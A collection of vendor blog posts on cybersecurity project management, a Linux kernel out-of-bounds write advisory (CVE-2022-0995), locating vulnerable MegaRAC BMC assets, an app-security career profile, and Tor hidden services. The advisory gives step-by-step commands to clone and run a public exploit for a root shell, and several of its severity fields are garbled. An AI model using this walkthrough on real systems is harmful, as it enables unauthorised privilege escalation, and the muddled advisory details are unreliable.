Skip to content

Critical Factors for the Success of Cybersecurity Projects

Not investing in cybersecurity is a mistake that can cause incalculable loss to organizations. After the Covid-19 pandemic, digital vulnerability has reached alarming numbers with the implementation of the home office work model, bringing the need to develop effective cybersecurity projects to serve the most diverse industries.

The process of developing cybersecurity projects is challenging. With that in mind, our article brings 4 critical factors for the success of this type of action.

Senior Management Support

In a company, all projects of great relevance must go through the approval or refusal of senior management. If the decision is for the implementation of the project, the engagement and cooperation of leaders are essential for the action to be successful. Regarding the adoption of cybersecurity measures, it is no different.

Gaining the support of senior management is one of the critical factors for the successful implementation of a cybersecurity plan. If a company’s management knows and trusts the project’s ability to meet the demands of its business, it will be ready to adopt it.

User Awareness

Presenting the purpose and importance of cybersecurity projects is an essential part of informing and raising users’ awareness. In order to engage employees and show how their actions can affect everyone within a digital environment, training should be applied with practical examples of the dangers posed by cyber risks and showing how to prevent them using the tools and solutions provided by the project.

Moreover, teams should be aware of Incident Response, Disaster Recovery, and Business Continuity Plans. In this way, it will be possible to create a greater sense of responsibility and engagement in all users, and not only in those specifically assigned to the company’s IT area.

Monitoring and Control of Scope, Term, and Budget

The scope of a project contains the mapping of all the work necessary for its progress and completion. It contains the defined goals and each of the stages for implementing the project. Monitoring and controlling the scope is to always remain alert for any changes that may arise in the development of the project, managing which are necessary or dispensable; which are within the budget and schedule available; and which have had approval and agreement from all people involved.

It is still necessary to track each of these changes to obtain an optimization of time and assignment of staff in the establishment of tasks so that the modifications do not negatively affect the project journey.
It is also important to create a project scope statement and make sure all stakeholders understand it. When dealing with external clients, it is also necessary to have a policy of changes and restrictions.

Conclusion

In this article, you found out what are the critical factors to succeed in developing cybersecurity projects. Did you like our content? Then share it with someone also interested in the topic.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Segura®
Segura® strive to ensure the sovereignty of companies over actions and privileged information. To this end, we work against data theft through traceability of administrator actions on networks, servers, databases and a multitude of devices. In addition, we pursue compliance with auditing requirements and the most demanding standards, including PCI DSS, Sarbanes-Oxley, ISO 27001 and HIPAA.

Out-of-Bound (OOB) Write Memory Flow CVE–2022-0995

Introduction:

An out-of-bounds (OOB) memory write flaw was found in the Linux kernel’s watch_queue event notification subsystem. This flaw can overwrite parts of the kernel state, potentially allowing a local user to gain privileged access or cause a denial of service on the system. Vulnerability Release Time:
  • 2022-03-14 11:43 UTC
Vulnerability Impact & Type
  • Successful exploitation of this vulnerability could lead to disclosure of sensitive information, addition or modification of data, or Denial of Service (DoS).
  • Privilege Escalation
Affected Products:
  • This vulnerability exist in all Linux versions up to 5.17 RC1 till RC7
Fixed Versions
  • Kernel 5.17 RC8 and above
Severity: The software writes data past the end, or before the beginning, of the intended buffer. This typically occurs when the pointer or its index is incremented or decremented to a position beyond the bounds of the buffer or when pointer arithmetic results in a position outside of the valid memory location to name a few. This may result in corruption of sensitive information, a crash, or code execution among other things. CVSS v3.1:
  • Base Score: 7.2 (High)
  • CWD ID: 787
  • Vulnerability type: Low
  • Gained Access: None
  • Authentication: None
  • Confidentiality Impact: Complete
  • Integrity Impact: Complete
  • Availability Impact: Complete
  • Access Complexity: Low
Mitigation: Mitigation for this issue is either not available or the currently available options don’t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability Technical Analysis / Exploits: 1. Login to my linux machine as a normal user and shown the linux version I’m using. 2. Now let’s download exploit data in our local machine. Use below command to successfully download exploit data from github repository: 
git clone https://github.com/Bonfee/CVE-2022-0995.git
3. After cloning the repository, change current directory to downloaded repository directory using below command: cd CVE-2022-0995 After the script completes its execution, you will successfully get the root user shell. ./exploit 4. After the script completes its execution, you will successfully get the root user shell. 5. Now, use below command to get bash shell of root user: /bin/bash/ Now you are at root user bash shell and you can do everything as a root user. Reference: 
● https://github.com/Bonfee/CVE-2022-0995
● https://nvd.nist.gov/vuln/detail/CVE-2022-0995
● https://access.redhat.com/security/cve/cve-2022-0995
#CVE–2022-0995 #Linux #kernel #Out-of-Bound(OOB)

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

Finding MegaRAC BMC assets on your network

Earlier this week, researchers with Eclypsium shared findings on three vulnerabilities present in American Megatrends (AMI) MegaRAC firmware. MegaRAC can be found in many server manufacturers’ Baseboard Management Controllers (BMCs), including AMD, Ampere Computing, ASRock, Asus, ARM, Dell EMC, Gigabyte, HPE, Huawei, Inspur, Lenovo, Nvidia, Qualcomm, Quanta, and Tyan. Successful exploitation of these vulnerabilities can provide an attacker with remote code execution, an administrative shell, and user enumeration. Given American Megatrend’s broad reach across server manufacturers and models the number of systems with vulnerable MegaRAC BMC firmware could be quite large.

What is the impact?

These vulnerabilities are scored as CVSS “critical” and “high” severities, and the reported vulnerability details include:

  • CVE-2022-40259 (CVSS “critical” score of 9.9) – Remote code execution via Redfish API; requires initial access to an account with callback privileges or higher
  • CVE-2022-40242 (CVSS “high” score of 8.3) – Administrative shell via default credentials
  • CVE-2022-2827 (CVSS “high” score of 7.5) – User enumeration via API request manipulation

The Eclypsium report does mention that public exposure of vulnerable BMCs appears to be “relatively low compared to recent high-profile vulnerabilities in other infrastructure products.” That said, data centers where many similar servers exist -–including data centers providing cloud-based resources-– could yield many opportunities for an attacker who has attained access, and detection of BMC exploitation can be “complex” and is likely to be missed with traditional EDR/AV.

Are updates available?

While American Megatrends has not made a security advisory available at the time of this publication, owners and administrators of systems with MegaRAC BMC firmware should check with their server manufacturers for patched firmware updates.

Mitigations are offered in the Eclypsium report (see the “Mitigations” section), including (but not limited to) the following suggestions:

  • Ensure that all remote server management interfaces (e.g. Redfish, IPMI) and BMC subsystems in their environments are on their dedicated management networks and are not exposed externally, and ensure internal BMC interface access is restricted to administrative users with ACLs or firewalls.
  • Review vendor default configurations of device firmware to identify and disable built-in administrative accounts and/or use remote authentication where available.

How do I find potentially vulnerable MegaRAC BMC assets with runZero?

From the Asset Inventory, use the following pre-built query to locate BMC assets running MegaRAC firmware which may need remediation:

type:"BMC" and (hw:"MegaRAC" or os:"MegaRAC")
The prebuilt query is available in the Queries Library

You can also locate all BMC assets in your environment by searching your Asset inventory for type:"BMC", which can then be triaged further.

As always, any prebuilt queries are available from our Queries Library. Check out the library for other useful inventory queries.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About runZero
runZero, a network discovery and asset inventory solution, was founded in 2018 by HD Moore, the creator of Metasploit. HD envisioned a modern active discovery solution that could find and identify everything on a network–without credentials. As a security researcher and penetration tester, he often employed benign ways to get information leaks and piece them together to build device profiles. Eventually, this work led him to leverage applied research and the discovery techniques developed for security and penetration testing to create runZero.

Thriving as an app security engineer: 6 reasons to work in cybersecurity

Although the application security (app sec) role can seem the same in every industry, it’s not. Businesses operating in general industries offer fewer possibilities for comprehensive professional growth than security-focused companies. That was the case for Marvin Petzolt, a Senior Application Security Engineer at Nord Security, who jumped from an application security engineer role at a music-sharing business to a security-oriented company. Let Marvin tell us in his own words what factors make app sec professionals thrive at our company.
Marvin Petzolt, Senior Application Security Engineer at Nord Security

#1 You make an impact

Many people, including me, enjoy working at a place where you can make an impact. As an app security engineer at Nord, I can influence security design and the implementation of some of the greatest cybersecurity products in the industry – NordVPN, NordPass, NordLayer, and NordLocker. By ensuring high-security standards for each product, I contribute to building meaningful, user-friendly, and security-centric consumer solutions valued by millions of people and businesses worldwide.

However, having a tangible impact on security products is not the only way I can make a difference. My security recommendations and guidelines are also taken into account when improving business operations or team workflow. For example, when I joined the Application Security Team, we would be notified of upcoming Nord product updates mainly via our automatization and notification bots. However, this approach left us very little time between security testing of the upcoming feature and release to production, which naturally increased pressure on the team.

So I initiated the concept of security product owners, establishing a bi-directional exchange between a specific Nord product and the Application Security team. This concept allowed us to improve communication between developers, team leads, and the Application Security team.

We’re now notified about upcoming changes significantly earlier, leaving us enough time for all the necessary app security tests.

#2 You can reach your full professional potential

The truth is that being an application security specialist in the general industry doesn’t let you reach your full professional potential due to the limited app security cases and tasks you’re working on. This was one of the key reasons why I left a promising application security engineer role at one of the best-known music-sharing companies. There I was securing mainly one app, so the security issues that challenged me were limited.

I wanted to face different app security cases, advance my career, and concentrate more on technical work, security design, and cryptography – things I’m passionate about.

A security-focused company like Nord Security, with its wide range of applications and potential for different security cases, seemed like a natural solution to fulfill all these goals.

#3 You work with meaningful products and interesting challenges

At Nord Security, I’m contributing to building meaningful products – such as NordVPN, NordPass, NordLayer, and NordLocker – that secure people and businesses online.

Most of the time, I focus on cryptography, security architecture, and low-level, client-side implementations. I perform occasional design reviews, threat model sessions, pentesting of features and release candidates, and security code reviews.

Still, my tasks are pretty diverse and depend on what I want to work on. One day I might look into NordLocker’s architecture and how it will encrypt files in the future. The next day, I’ll focus on reviewing the code of NordVPN’s Meshnet feature, establishing a peer-to-peer connection between two endpoints to exchange data or route internet traffic to verify that it is implemented securely. I’ll sometimes also do a black-box security assessment on the NordPass Android release client.

#4 You work with an experienced team

Working in a security-centric company like Nord Security, you can be sure that you’ll always be guided by some of the best professionals in the cybersecurity field.

If you’re facing a challenging situation that is too difficult or complex for you to cope with on your own, the whole Application Security team comes in to help. The team member with the most experience assesses the issue based on severity and validity. If it’s valid, as a team, we determine how we can support in escalating this issue and jump in to help resolve it as fast as possible.

One of the most useful insights I have received from my team is that an app sec professional doesn’t have to know or be involved in all aspects of the team’s work. Application security has many subcategories and specializations, such as Windows Security, Linux Security, Android, and iOS security. It’s hard enough to keep up with one specialization, but keeping up with all of them is nearly impossible. So it’s OK not to be an expert in all of these technologies, and this is where you can rely on the other members of your team.

Another valuable tip – don’t over-complicate. Keep it user-friendly. The perfect security solution usually doesn’t exist or comes with a heavy impact on the user experience. Having a 32-character password requirement or providing your biometric authentication for every action you take on the app doesn’t help anybody. So it is important to focus on realistic threats and put minor theoretical risks aside for later.

Finally, my team taught me how important it is to keep the cryptographic systems simple. When designing a cryptographic system, the key is to keep it as simple as possible so that anybody can understand it and be able to securely extend this system. The more features and changes are added, the more complex the system becomes. That’s why it is necessary to redesign and realign the cryptographic design from the ground up to better fit the new requirements. If you don’t do that, you have a design that nobody understands. That makes it impossible to apply the necessary security and confidentiality measures.

#5 You are given opportunities to learn

If you’re just starting out in an app security position, coming from a slightly different field, such as web or cloud security, or simply want to learn more, even in a senior position, your team and the whole company will be there to help you grow.

If you’re a newbie, one member of your team will become your onboarding buddy, helping you to get up to speed with everything that is going on in the Application Security team. Additionally, you will be provided with a dedicated document leading you through your 30- and 90-day milestones and a checklist of all the tools and access you require to get started.

To keep our team performing at its best, we have knowledge-sharing sessions, pairing sessions, and daily standups. All this helps us stay updated on each other’s work, share best practices, and sharpen our skills in the app security field. As a team, we also have a Friday tradition of “self-allocated time” when we learn something new. What we choose to learn can be anything from technologies, reading blog posts, news articles, or methodologies. Did you ever want to learn how to develop iOS applications or do a CTF? Then self-allocated time is meant for that.

Collaboration with other teams also has a huge impact on advancing your expertise in app security. It improves your soft skills and teaches effective communication about the risks and severities of security issues. It also gives you a direct connection to developers, which means that they will come to you with questions and concerns during the development process. In turn, it gives you a unique inside look into the technical foundation of the developed software. Just like that, I learned new technologies and programming languages on the fly since they were required to understand the source code and implementation details.

At the company level, we have knowledge-sharing events. One such example is Tech Days, allowing our people to stay in tune with the latest tech and cybersecurity news, trends, and advancements.

Nord Security also offers a personal development budget that can be used for training or certifications, helping us improve in our field. Moreover, teams often visit various conferences, such as Black Hat, to keep a finger on the pulse of the latest in the field of information security.

Last but not least, everybody can have their own personal development plan. It helps me stay aligned with the overall goals of the security team and how my part might fit in the bigger picture. Personally, I would like to dive even deeper into security architecture and cryptography, so I have aligned this goal on my personal development plan in cooperation with my manager.

#6 You don’t have to convince everyone of the importance of security

As an app security specialist, you understand that security should be a top priority in every company. And if you ask a company about it, of course, they will indicate security is their number one priority but is this actually true? From my experience, you always end up arguing with product managers, product owners, and engineering managers about security improvements. Yet, in a company that has security as its main selling point, it becomes easier to motivate security changes and push people in the right direction.

All these reasons are why application security professionals thrive at Nord Security. If you also want to advance your career in this field, join the Application Security team in Lithuania, Germany, or remotely by applying HERE.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Nord Security
The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

The Dark Stuff – Tor – Continued

Intro

We talked about how to access the tor network, what it is, what a tor circuit and torrc file are, and other stuff. For this one, I’d like to focus on some of the core Tor concepts, as well as possible considerations, issues, weaknesses, risks inherent to Tor, and their appropriate management and mitigation.

Hidden services

This is basically just a relay that offers a web service or any other Internet service; A hidden service is a type of service that’s accessible only through a .onion URL, and its actual IP address is basically hidden behind the Tor circuit.

To host a hidden service, you need to install a web server or any other service you want to host; add this to your torrc file:

HiddenServiceDir /var/lib/tor/service


HiddenServicePort 80 <ip>:80

Tor will then generate a public-private key pair for your service, and it will write it to a file called private_key. It will also create a hostname file.

example –

/var/lib/tor/service/private_key                 


/var/lib/tor/hostname

The hostname file will have the name of your .onion address, as well as the information about your public key.

Obviously, to run a service such as this, you need to know what’s at stake, and if you’re doing it in the first place, you’re probably of the general idea to hide your IP; thus, you should appropriately harden your systems and take the risks into account.

This can be achieved in a myriad of ways, so I like to ponder these topics from a more general/high-level perspective. One possible way to isolate yourself is true virtualization and compartmentalization. Whoonix also comes to mind, as its double VMs setup makes all your traffic routed through the Whoonix gateway, and both of these systems are hardened and preconfigured out-of-the-box, of course, they should be reconfigured if necessary. This would be one example of how you might make it harder for attackers to figure out your real IP address.

However, I am not an expert on how to run hidden services, far from it, I just wanted to sort of ‘define’ them, so I can tie them into our whole narrative here.

Tor2web

Tor2web lets you access hidden service with a standard web browser. (No connection to the Tor network)

Basically, wherever you see a .onion URL, you can replace it with .onion.to, .onion.city, .onion.cab, .onion.direct, etc. Note that this is not anonymous, private or anything like that. This is just a way of accessing without connecting to the Tor network.

From the Tor2web site:

WARNING: Tor2web only protects publishers, not readers. As a reader installing Tor Browser will give you much greater anonymity, confidentiality, and authentication than using Tor2web. Using Tor2web trades off security for convenience and usability.

Tor – reflections – .onion URLs, stuff & risk

Since the darkweb is not indexed by the clearweb search engines finding/discovering hidden services can be difficult. Places where you can find the .onion links are usually Hidden Wikis, Twitter, Reddit, Pastebin, Github and internet forums. You should be able to google search for these links as well.

*A note on hidden wikis – there are many websites that claim to be the hidden wiki and the uncensored Tor hidden wiki – be mindful if/when clicking on here as you can’t always be sure where that exit node is leading to.

As you know, Tor is decentralized by nature, so there is no list of all hidden services, but there are hidden services whose task is to catalog those known .onion addresses.

Such as this.

There are also Torch, Sinbad, and other search engines, but it remains to you to decide how worthy they are.

While we’re on the topic, I’d like to point out that you should always be mindful of the potential risks you’re opening yourself to. Every action counts, and you should take necessary precautions, always.

A good way to illustrate this are the CTFs I participated in, that required us to investigate data collected from Tor that pertains to a slew of illegal activities. The organizers simply didn’t render any content, thus eliminating the risk for us analysts.

You could only see what was relevant for your investigation, be that a hash, bitcoin address, email address, or anything else that was of relevance and scraped to the dataset.

When you’re doing this by yourself, there’s no organizer to filter out stuff for you, so always be mindful of that.

More reflections on Tor and Mitigations

Tor prevents your ISP/local network from knowing what you visited, prevents tracking, and helps with avoiding censorship.

However, the 3-letter agencies dislike Tor; mainly because Tor is the best network for these uses, thus it is always under attack, and when it is, its mostly to deanonymyze its users.

If you’re in locations that might be targeted and risk is high, or your adversary has significant resources, you should not rely on Tor to anonymyze you.

Another big weakness for Tor is you, the user. This is due to you not having good Opsec, which will defeat the purpose of Tor, by default.

Other weaknesses are browser-based attacks, as well as attacks against the host OS.

Of course, you can mitigate and reduce the probability of these attacks and this implies you having some controls implemented.

First and foremost, go back to Opsec basics, learn it inside and out, and create your model.

You should also leverage isolation, compartmentalization/virtualization to reduce the impact and possibility of browser exploits (or other attacks) being successful.

Never install Tor on your main OS, especially if the consequences are high.

Use hardened VMs.

Just running the tor browser in windows is NOT a good idea. Assume the Tor browser is exploitable and mitigate appropriately, use isolation.

Whatever is your isolation, it also needs to be hardened.

To future proof yourself against unknown threats, you need non-persistence; you should not rely on the Tor browser to purge all that data fully reliably. However, you can get this through Tails and other live OSes, VMs or you can use whole disk encryption and secure delete. You can also use combination of these methods to better protect yourself.


Be aware of the design documentation – https://2019.www.torproject.org/projects/torbrowser/design/

Conclusion

I hope I’ve put you on a path down the rabbit hole called Tor! There’s so much more, and I will cover as much as I possibly can.

Stay tuned.

Cover image by JC Gellidon

#tor #risk #tracking #deanonymization

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

×

Hello!

Click one of our contacts below to chat on WhatsApp

Social Chat is free, download and try it now here!

×